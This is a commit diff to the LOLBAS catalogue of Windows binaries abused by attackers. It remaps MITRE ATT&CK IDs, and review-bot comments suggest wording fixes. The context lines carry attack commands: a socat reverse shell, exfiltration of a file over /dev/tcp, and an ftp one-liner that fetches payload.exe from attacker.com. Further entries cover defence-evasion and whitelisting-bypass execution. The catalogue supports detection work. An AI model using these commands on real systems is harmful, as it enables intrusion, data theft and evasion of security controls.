mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
More changes (mainly changing some T1218 instances to T1202)
This commit is contained in:
parent
2577066af9
commit
bc51cb4e03
@ -9,28 +9,28 @@ Commands:
|
|||||||
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
|
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
|
||||||
Description: Executes a reverseshell
|
Description: Executes a reverseshell
|
||||||
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
|
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
|
||||||
Description: Exfiltrate data
|
Description: Exfiltrate data
|
||||||
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
- Command: bash.exe -c calc.exe
|
- Command: bash.exe -c calc.exe
|
||||||
Description: Executes calc.exe from bash.exe
|
Description: Executes calc.exe from bash.exe
|
||||||
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
|
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
|
||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\bash.exe
|
- Path: C:\Windows\System32\bash.exe
|
||||||
|
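Review bot: the Usecase on the socat reverse-shell and the /dev/tcp exfiltration entries (`Usecase: Performs execution of specified file, can be used as a defensive evasion.`) is copied from the generic execute entry and does not describe what those two commands do; their Description lines (`Executes a reverseshell`, `Exfiltrate data`) are closer. Suggest one Usecase per command, for example "Spawn a reverse shell from WSL bash so the Windows-side command line shows only bash.exe", and write "reverse shell" as two words. The exfiltration entry also keeps `Category: Execute` although its Description is data exfiltration, so category and description disagree. The T1218 to T1202 move itself is consistent with MITRE, which names Windows Subsystem for Linux in the Indirect Command Execution description.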
@ -16,7 +16,7 @@ Commands:
|
|||||||
Usecase: Use diskshadow to bypass defensive counter measures
|
Usecase: Use diskshadow to bypass defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1003
|
MitreID: T1202
|
||||||
OperatingSystem: Windows server
|
OperatingSystem: Windows server
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\diskshadow.exe
|
- Path: C:\Windows\System32\diskshadow.exe
|
||||||
|
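Review bot: the visible Usecase `Use diskshadow to bypass defensive counter measures` is too generic to justify the T1003 to T1202 change on its own. T1202 fits if this entry is the proxy-execution use of diskshadow; if the Command at the top of the entry (outside the hunk context) is the shadow-copy case used to reach NTDS.dit, T1003 should stay, so please check against that Command line. Style: `OperatingSystem: Windows server` should be `Windows Server`, and the Usecase would read better as "countermeasures".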
@ -9,14 +9,14 @@ Commands:
|
|||||||
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
|
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: explorer.exe C:\Windows\System32\notepad.exe
|
- Command: explorer.exe C:\Windows\System32\notepad.exe
|
||||||
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||||
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
|
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 10 (Tested)
|
OperatingSystem: Windows 10 (Tested)
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\explorer.exe
|
- Path: C:\Windows\explorer.exe
|
||||||
|
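Review bot: the Description `Execute calc.exe with the parent process spawning from a new instance of explorer.exe` contradicts its own Command `explorer.exe C:\Windows\System32\notepad.exe`; one of the two must change, and replacing calc.exe with notepad.exe in the Description is the minimal fix. `OperatingSystem: Windows 10 (Tested)` also differs in form from the first entry's list (`Windows XP, Windows 7, ...`); either use the same style for both entries or drop the parenthetical. The T1202 mapping is sound: the point of the explorer.exe relaunch is the broken parent/child chain the Usecase describes, which is indirect execution rather than proxying a signed binary.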
@ -9,7 +9,7 @@ Commands:
|
|||||||
Usecase: Use forfiles to start a new process to evade defensive counter measures
|
Usecase: Use forfiles to start a new process to evade defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
|
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
|
||||||
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
|
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
|
||||||
|
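Review bot: `Alternate Data Stream (AD)` in the Description should be `(ADS)`; `AD` reads as Active Directory. `Windows vista` should be `Windows Vista`. The T1202 mapping is right; MITRE lists forfiles explicitly under Indirect Command Execution. It would help readers to state in the Description that the `/c` command is run once for every file matched by `/p` and `/m`, which is why the example pins a single file (notepad.exe) in system32.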
@ -9,7 +9,7 @@ Commands:
|
|||||||
Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
|
Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
|
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
|
||||||
Description: Download
|
Description: Download
|
||||||
|
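Review bot: the Usecase `Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand` is two fragments with a bare command template in the second; rewrite as one sentence that names the mechanism the entry's Command relies on (the Command itself is outside the hunk context, so check it when rewording). For the Download entry shown as context, `Description: Download` is the only explanation of a seven-command one-liner; say that it writes an ftp script to ftp.txt (including the `USER`/`PASS` lines) and drives ftp.exe non-interactively with `-s:ftp.txt`, since the on-disk script is what a defender would look for.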
@ -9,14 +9,14 @@ Commands:
|
|||||||
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
|
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1216
|
MitreID: T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: Gpscript /startup
|
- Command: Gpscript /startup
|
||||||
Description: Executes startup scripts configured in Group Policy
|
Description: Executes startup scripts configured in Group Policy
|
||||||
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
|
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Administrator
|
Privileges: Administrator
|
||||||
MitreID: T1216
|
MitreID: T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\gpscript.exe
|
- Path: C:\Windows\System32\gpscript.exe
|
||||||
|
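Review bot: both gpscript entries carry `Usecase: Add local group policy logon script to execute file ...`, but the second Command is `Gpscript /startup` with `Description: Executes startup scripts configured in Group Policy`; that entry's Usecase should say startup script, because startup (computer) and logon (user) scripts are different Group Policy items and are configured in different places. The T1216 to T1218 change is correct: gpscript.exe is a signed binary, not a script, so Signed Script Proxy Execution never applied. Since this hunk moves in the opposite direction from the one the commit message states (`T1218 instances to T1202`), add a line about it there.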
@ -16,7 +16,7 @@ Commands:
|
|||||||
Usecase: Execute process with HH.exe
|
Usecase: Execute process with HH.exe
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1216
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\hh.exe
|
- Path: C:\Windows\System32\hh.exe
|
||||||
|
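Review bot: `Usecase: Execute process with HH.exe` says neither what is executed nor why HH.exe is useful as a proxy (a signed Microsoft binary present by default); expand it to match the detail in the other files touched here. On the ID: T1202 is defensible for plain process execution, and T1216 never fit an .exe, but MITRE has a dedicated sub-technique for HTML Help, T1218.001 (Compiled HTML File). If this entry or the other one in the file runs a .chm payload, T1218.001 is the more precise mapping, and the commit already uses a sub-technique ID for pubprn.vbs.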
@ -9,21 +9,21 @@ Commands:
|
|||||||
Usecase: Proxy execution of binary
|
Usecase: Proxy execution of binary
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: pcalua.exe -a \\server\payload.dll
|
- Command: pcalua.exe -a \\server\payload.dll
|
||||||
Description: Open the target .DLL file with the Program Compatibilty Assistant.
|
Description: Open the target .DLL file with the Program Compatibilty Assistant.
|
||||||
Usecase: Proxy execution of remote dll file
|
Usecase: Proxy execution of remote dll file
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
|
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
|
||||||
Description: Open the target .CPL file with the Program Compatibility Assistant.
|
Description: Open the target .CPL file with the Program Compatibility Assistant.
|
||||||
Usecase: Execution of CPL files
|
Usecase: Execution of CPL files
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\pcalua.exe
|
- Path: C:\Windows\System32\pcalua.exe
|
||||||
|
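Review bot: typo `Program Compatibilty Assistant` in the first Description; the second entry spells it correctly, so align them. The wording of that entry is also internally inconsistent: the Usecase says `Proxy execution of remote dll file` while the Description says `Open the target .DLL file`; use "execute" in both, since the `-a` argument is launched, not opened for viewing. T1202 is the right ID for all three entries; MITRE names pcalua.exe in the Indirect Command Execution description.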
@ -9,10 +9,10 @@ Commands:
|
|||||||
Usecase: Execute binary through proxy binary to evade defensive counter measurments
|
Usecase: Execute binary through proxy binary to evade defensive counter measurments
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1202
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
||||||
Description: Executes calc.cmde from remote server
|
Description: Executes calc.cmd from remote server
|
||||||
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
|
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
|
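Review bot: the `calc.cmde` to `calc.cmd` fix is good, but the same hunk still carries `counter measurments` twice (`... to evade defensive counter measurments` and the `from external server` variant); the word wanted is "countermeasures". The hunk ends at the second entry's `Privileges: User`, so that entry's MitreID line is outside the change; confirm it was also moved to T1202 so the two ScriptRunner entries do not disagree with each other.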
@ -9,7 +9,7 @@ Commands:
|
|||||||
Usecase: Proxy execution
|
Usecase: Proxy execution
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1216
|
MitreID: T1216.001
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
- Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||||
|
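Review bot: T1216.001 is MITRE's PubPrn sub-technique, so this is the most precise mapping in the whole commit. Two follow-ups: the commit message only mentions the T1218 to T1202 moves, so list this change (and the gpscript T1216 to T1218 change) there; and this is the only file in the set given a sub-technique ID while the others stay at parent level, so state whether sub-technique granularity is the intended convention, otherwise future contributors will keep mixing the two. `Usecase: Proxy execution` could also name what is proxied, as the pcalua entries do.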